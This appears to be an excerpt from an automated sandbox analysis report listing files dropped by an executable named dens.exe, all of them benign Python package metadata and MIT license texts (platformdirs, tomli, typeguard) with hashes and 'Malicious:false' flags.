                                                                                                                                                                                                                                            SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                            SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11429
                                                                                                                                                                                                                                            Entropy (8bit):5.039575520713946
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:n9x/tlCtlsaCUpVQ7yHwgNF8NFvWVDM1RnzadSibNTTh+fOnnxa6jlES4h8a8KAH:3/tlCfsqpq7ydZzM0dGiCbvHcjNj61TA
                                                                                                                                                                                                                                            MD5:12306075DF09A0DBB93315FADDDF73FB
                                                                                                                                                                                                                                            SHA1:1AC8A3679AFCFEEC0BA00851F5F8095DD1B060CD
                                                                                                                                                                                                                                            SHA-256:CE6B227B4D46D4CB57474C2022FE57A557933BB89DAF4596BDF9B12AC296B869
                                                                                                                                                                                                                                            SHA-512:BA0A72B888A14F82FD44FB103C01EF0900B5302F18E986A8264A9A08AB77D1C655C392374FD7B0A98BEF9B9511F6EC78AF3EF8936091C80A0B5364F7A53DC20A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.3.Name: platformdirs.Version: 4.2.2.Summary: A small Python package for determining appropriate platform-specific dirs, e.g. a `user data dir`..Project-URL: Documentation, https://platformdirs.readthedocs.io.Project-URL: Homepage, https://github.com/platformdirs/platformdirs.Project-URL: Source, https://github.com/platformdirs/platformdirs.Project-URL: Tracker, https://github.com/platformdirs/platformdirs/issues.Maintainer-email: Bern.t G.bor <gaborjbernat@gmail.com>, Julian Berman <Julian@GrayVines.com>, Ofek Lev <oss@ofek.dev>, Ronny Pfannschmidt <opensource@ronnypfannschmidt.de>.License-Expression: MIT.License-File: LICENSE.Keywords: appdirs,application,cache,directory,log,user.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1642
                                                                                                                                                                                                                                            Entropy (8bit):5.780720255872038
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:bn/2zDzoobEsJhfPWcs013+pj456szN6lnhta57WJ+guQg4:bnuXcob5Jhfucs+d49hta9WJ+g1X
                                                                                                                                                                                                                                            MD5:0E141A28570FC62974FC5CEADFE808E3
                                                                                                                                                                                                                                            SHA1:7B92561C5BBBA83D6E16A1C7B195089ACA1766AF
                                                                                                                                                                                                                                            SHA-256:4C211D76D42ED40EFC3ACFCC866D8912A718AFBCA2B7E51849442366D6E99FE8
                                                                                                                                                                                                                                            SHA-512:830721C18A35AECD1EFB81A5FAAF8AC0EA02428EDC5B294458556343788D894B76035F1E661214D975DF2A64DC8C3D6AAA7A53A99BE64B9413B6A5D89D549F9D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:platformdirs-4.2.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..platformdirs-4.2.2.dist-info/METADATA,sha256=zmsie01G1MtXR0wgIv5XpVeTO7idr0WWvfmxKsKWuGk,11429..platformdirs-4.2.2.dist-info/RECORD,,..platformdirs-4.2.2.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..platformdirs-4.2.2.dist-info/WHEEL,sha256=zEMcRr9Kr03x1ozGwg5v9NQBKn3kndp6LSoSlVg-jhU,87..platformdirs-4.2.2.dist-info/licenses/LICENSE,sha256=KeD9YukphQ6G6yjD_czwzv30-pSHkBHP-z0NS-1tTbY,1089..platformdirs/__init__.py,sha256=EMGE8qeHRR9CzDFr8kL3tA8hdZZniYjXBVZd0UGTWK0,22225..platformdirs/__main__.py,sha256=HnsUQHpiBaiTxwcmwVw-nFaPdVNZtQIdi1eWDtI-MzI,1493..platformdirs/__pycache__/__init__.cpython-312.pyc,,..platformdirs/__pycache__/__main__.cpython-312.pyc,,..platformdirs/__pycache__/android.cpython-312.pyc,,..platformdirs/__pycache__/api.cpython-312.pyc,,..platformdirs/__pycache__/macos.cpython-312.pyc,,..platformdirs/__pycache__/unix.cpython-312.pyc,,..platformdirs/__p
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):87
                                                                                                                                                                                                                                            Entropy (8bit):4.730668933656452
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeXAaCTR73RP+tPCCfA5I:Rt2PFRWBB3
                                                                                                                                                                                                                                            MD5:8895639B8515B3094302B59E28AFB562
                                                                                                                                                                                                                                            SHA1:FBD4DA759EA5BEB65AE820DFBC47F9B569E89519
                                                                                                                                                                                                                                            SHA-256:CC431C46BF4AAF4DF1D68CC6C20E6FF4D4012A7DE49DDA7A2D2A1295583E8E15
                                                                                                                                                                                                                                            SHA-512:B53C0978DAD2A7195058ABC7B7D20A229EC617BDDBB364D8ED2354F37D5071208735774350F9FBBA5C804BEFCEFE71C27BC5E468E12899DF4687189C468785A0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: hatchling 1.24.2.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1089
                                                                                                                                                                                                                                            Entropy (8bit):5.119723466133474
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:VrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:VaJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                                            MD5:EA4F5A41454746A9ED111E3D8723D17A
                                                                                                                                                                                                                                            SHA1:F511A8A63AF8C6E36004B593478436BBC560EE0C
                                                                                                                                                                                                                                            SHA-256:29E0FD62E929850E86EB28C3FDCCF0CEFDF4FA94879011CFFB3D0D4BED6D4DB6
                                                                                                                                                                                                                                            SHA-512:CACA68A5589CA2EAB7C0D74BA5D2B25E3367B9902DFC7578BBA911AC8F8BF1C3A13F25E663C5B6B19BA71BF611943E23F4D0A99BE92A8F7D7FF60732DC3DD409
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MIT License..Copyright (c) 2010-202x The platformdirs developers..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1072
                                                                                                                                                                                                                                            Entropy (8bit):5.10135495500641
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:f9rmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:1aJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                                            MD5:AAAAF0879D17DF0110D1AA8C8C9F46F5
                                                                                                                                                                                                                                            SHA1:9DA6CA26337A886FB3E8D30EFD4AEDA623DC9ADE
                                                                                                                                                                                                                                            SHA-256:B80816B0D530B8ACCB4C2211783790984A6E3B61922C2B5EE92F3372AB2742FE
                                                                                                                                                                                                                                            SHA-512:EECD0C29FEBF51ADEFB02F970E66EFE7E24D573686DFDB3BEEA63CEFEA012A79CE3C49A899B4F26E9B67DC27176B397F6041909227281F9866BEEDC97389095C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MIT License..Copyright (c) 2021 Taneli Hukkinen..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CON
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8875
                                                                                                                                                                                                                                            Entropy (8bit):4.884349533695185
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:h15VsahrDzoGlmLxUJyLIPXR/yrKK3Trclclg2pj4VRR6V8wNVonQd:3swrAamWuIPA2K3v2g
                                                                                                                                                                                                                                            MD5:CBBF7047A51FEDA58386E86182B85B8A
                                                                                                                                                                                                                                            SHA1:D3EA3BDA227794AE35FE7FFC5BD6E5FA2A5EF250
                                                                                                                                                                                                                                            SHA-256:CCF0DC78A98FC0918B5AD67292B1E2C4BED65575A6246CD9D63C914F9942A0F2
                                                                                                                                                                                                                                            SHA-512:A994914F1676790730C6BDACA26FE5F1B18BA9A3B9F0D24D708C722424DED255360A0CC88E239C6BFE467BD2763DF7339BB6B760AB090FAE474A7C9C8AFA8948
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: tomli.Version: 2.0.1.Summary: A lil' TOML parser.Keywords: toml.Author-email: Taneli Hukkinen <hukkin@users.noreply.github.com>.Requires-Python: >=3.7.Description-Content-Type: text/markdown.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: MacOS.Classifier: Operating System :: Microsoft :: Windows.Classifier: Operating System :: POSIX :: Linux.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: PyPy.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Typing :: Typed.Project-URL: Changelog, https://github.com/hukkin/tomli/blob/master/CHANGELOG.md.Project-URL:
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):999
                                                                                                                                                                                                                                            Entropy (8bit):5.89030761653127
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4n/2zDRv53Pb4EsJWc6QtD8r8N8bh8WNdop2+oM8+kzAL5+1:4nuXR1Pb45JWc6QmIebKWcpHoM8JMLy
                                                                                                                                                                                                                                            MD5:D5FAB61E3DB6B54B51FBA607865C195B
                                                                                                                                                                                                                                            SHA1:B94D9126E8FC9D5F29FAFBB67F068E2D111D17FC
                                                                                                                                                                                                                                            SHA-256:0CB9F9A451A1E365AC54B4C88662E1DA0CB54A72D16A5258FB0ABFF9D3E1C022
                                                                                                                                                                                                                                            SHA-512:ABD3EF61D8D578C1DE609560A6985503E60BD53F90DCFF54EBEE23714D9CD88DBA4036ED19B24EC62B8432550311894FCC47BDCCD7CE4DCDE82518F4E02E123C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:tomli-2.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..tomli-2.0.1.dist-info/LICENSE,sha256=uAgWsNUwuKzLTCIReDeQmEpuO2GSLCte6S8zcqsnQv4,1072..tomli-2.0.1.dist-info/METADATA,sha256=zPDceKmPwJGLWtZykrHixL7WVXWmJGzZ1jyRT5lCoPI,8875..tomli-2.0.1.dist-info/RECORD,,..tomli-2.0.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..tomli-2.0.1.dist-info/WHEEL,sha256=jPMR_Dzkc4X4icQtmz81lnNY_kAsfog7ry7qoRvYLXw,81..tomli/__init__.py,sha256=JhUwV66DB1g4Hvt1UQCVMdfCu-IgAV8FXmvDU9onxd4,396..tomli/__pycache__/__init__.cpython-312.pyc,,..tomli/__pycache__/_parser.cpython-312.pyc,,..tomli/__pycache__/_re.cpython-312.pyc,,..tomli/__pycache__/_types.cpython-312.pyc,,..tomli/_parser.py,sha256=g9-ENaALS-B8dokYpCuzUFalWlog7T-SIYMjLZSWrtM,22633..tomli/_re.py,sha256=dbjg5ChZT23Ka9z9DHOXfdtSpPwUfdgMXnj8NOoly-w,2943..tomli/_types.py,sha256=-GTG2VUqkpxwMqzmVO4F7ybKddIbAnuAHXfmWQcTi3Q,254..tomli/py.typed,sha256=8PjyZ1aVoQpRVvt71muvuq5qE-jTFZkK-GLHkhdebmc,26..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFMthP+tPCCfA5I:Rt1QqDWBB3
                                                                                                                                                                                                                                            MD5:FF39892A240316BD62B5832C03D504BC
                                                                                                                                                                                                                                            SHA1:3883FC4406CC9A73BE0B839C1A0C31D3DDD64829
                                                                                                                                                                                                                                            SHA-256:8CF311FC3CE47385F889C42D9B3F35967358FE402C7E883BAF2EEAA11BD82D7C
                                                                                                                                                                                                                                            SHA-512:B2E57D9C81BBFB7364B8216FC086B8F73C2F2B537E300FB250EFB7972E3908F77A3D504363676C50A195D307822C69EE9B689DE6C48A4E6B8A6BA89A5A99AC32
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.6.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1130
                                                                                                                                                                                                                                            Entropy (8bit):5.118590213496374
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:qt4rWHvH0yPP3Gt6Hw1hP9QHmsUv48OV/+dho3BoqxFB:/S/lPvKhlQHms5QK3WmFB
                                                                                                                                                                                                                                            MD5:F0E423EEA5C91E7AA21BDB70184B3E53
                                                                                                                                                                                                                                            SHA1:A51CCDCB7A9D8C2116D1DFC16F11B3C8A5830F67
                                                                                                                                                                                                                                            SHA-256:6163F7987DFB38D6BC320CE2B70B2F02B862BC41126516D552EF1CD43247E758
                                                                                                                                                                                                                                            SHA-512:8BE742880E6E8495C7EC4C9ECC8F076A9FC9D64FC84B3AEBBC8D2D10DC62AC2C5053F33B716212DCB76C886A9C51619F262C460FC4B39A335CE1AE2C9A8769A8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:This is the MIT license: http://www.opensource.org/licenses/mit-license.php..Copyright (c) Alex Gr.nholm..Permission is hereby granted, free of charge, to any person obtaining a copy of this.software and associated documentation files (the "Software"), to deal in the Software.without restriction, including without limitation the rights to use, copy, modify, merge,.publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons.to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or.substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,.INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR.PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE.FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF C
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3717
                                                                                                                                                                                                                                            Entropy (8bit):4.986068381037722
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DSQRbraktjaAckH94jQnJIK04Fak/grjspC3EklAJj:/Rakd4jA7ak/gvspNWmj
                                                                                                                                                                                                                                            MD5:B6DAAC02F66AC8403E9061881322BABE
                                                                                                                                                                                                                                            SHA1:9A94672CCFEA06156A5F8A321CD0626CFD233AE8
                                                                                                                                                                                                                                            SHA-256:CF675C1C0A744F08580855390DE87CC77D676B312582E8D4CFDB5BB8FD298D21
                                                                                                                                                                                                                                            SHA-512:9C6B7326C90396AA9E962C2731A1085EDB672B5696F95F552D13350843C09A246E0BBF0EC484862DFF434FA5A86DE4C0B7C963958ADE35A066B9D2384076DD47
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: typeguard.Version: 4.3.0.Summary: Run-time type checker for Python.Author-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.License: MIT.Project-URL: Documentation, https://typeguard.readthedocs.io/en/latest/.Project-URL: Change log, https://typeguard.readthedocs.io/en/latest/versionhistory.html.Project-URL: Source code, https://github.com/agronholm/typeguard.Project-URL: Issue tracker, https://github.com/agronholm/typeguard/issues.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Python: >=3.8.Description-Content
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2402
                                                                                                                                                                                                                                            Entropy (8bit):5.729208478282605
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:eDnuX3DVED9HDDeDfPDLkAosGDlDiVoBFj7XH0H3HuwVB6Kgfkx7J/Q1NK1cQyxk:eyX3WRHDiLPjksV7I47J/Q1U6Qyx5fsJ
                                                                                                                                                                                                                                            MD5:D680B2881597974ACD91750E5AB61010
                                                                                                                                                                                                                                            SHA1:E00ED2416B5CE21641E3946905504D62D536972F
                                                                                                                                                                                                                                            SHA-256:48A51959582478352275428CEECD78EF77D79AC9DAE796E39A2EAF2540282552
                                                                                                                                                                                                                                            SHA-512:112172ACB515B0712AC58D78898EB159580ADA3DD3F16AABB37CB7A8D964F9E4BADF2869A245927B83B208D56904831C0F04ED925C95DFCB705801734FB0C7BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:typeguard-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typeguard-4.3.0.dist-info/LICENSE,sha256=YWP3mH37ONa8MgzitwsvArhivEESZRbVUu8c1DJH51g,1130..typeguard-4.3.0.dist-info/METADATA,sha256=z2dcHAp0TwhYCFU5Deh8x31nazElgujUz9tbuP0pjSE,3717..typeguard-4.3.0.dist-info/RECORD,,..typeguard-4.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..typeguard-4.3.0.dist-info/entry_points.txt,sha256=qp7NQ1aLtiSgMQqo6gWlfGpy0IIXzoMJmeQTLpzqFZQ,48..typeguard-4.3.0.dist-info/top_level.txt,sha256=4z28AhuDodwRS_c1J_l8H51t5QuwfTseskYzlxp6grs,10..typeguard/__init__.py,sha256=Onh4w38elPCjtlcU3JY9k3h70NjsxXIkAflmQn-Z0FY,2071..typeguard/__pycache__/__init__.cpython-312.pyc,,..typeguard/__pycache__/_checkers.cpython-312.pyc,,..typeguard/__pycache__/_config.cpython-312.pyc,,..typeguard/__pycache__/_decorators.cpython-312.pyc,,..typeguard/__pycache__/_exceptions.cpython-312.pyc,,..typeguard/__pycache__/_functions.cpython-312.pyc,,..typeguard/__pycache__/_i
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):48
                                                                                                                                                                                                                                            Entropy (8bit):4.155187698990101
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:mWSJCQEjMitjHfLvn:mrMJHfbn
                                                                                                                                                                                                                                            MD5:AEAB5BCF8BF89A51C97C4CDF70578848
                                                                                                                                                                                                                                            SHA1:2E9C1617560AB66431AAB90700DB901985293485
                                                                                                                                                                                                                                            SHA-256:AA9ECD43568BB624A0310AA8EA05A57C6A72D08217CE830999E4132E9CEA1594
                                                                                                                                                                                                                                            SHA-512:2BE73E99296DF26A28835F91DD8BC50EB104AF06A3C54666175FAF322E0AD4620453DB0388531C4113B052A92C1D2E4C3088E25AF43CDE42AA852CF7B0CB5B05
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:[pytest11].typeguard = typeguard._pytest_plugin.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10
                                                                                                                                                                                                                                            Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:LEJn:M
                                                                                                                                                                                                                                            MD5:004A2A8CE1AB120A63902A27D76BD964
                                                                                                                                                                                                                                            SHA1:A4E367AB40410598DADD1FC5F680ED7A176BEB09
                                                                                                                                                                                                                                            SHA-256:E33DBC021B83A1DC114BF73527F97C1F9D6DE50BB07D3B1EB24633971A7A82BB
                                                                                                                                                                                                                                            SHA-512:0D8FF9A43897AB390AB41AFE5BAC8BD38A68C2BEF88E844E5B49BF70E3164B226975CC2717AE3DC3428D1CFBB0BE068C243F104915FEE1FFA58C23FBE76FDB89
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:typeguard.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
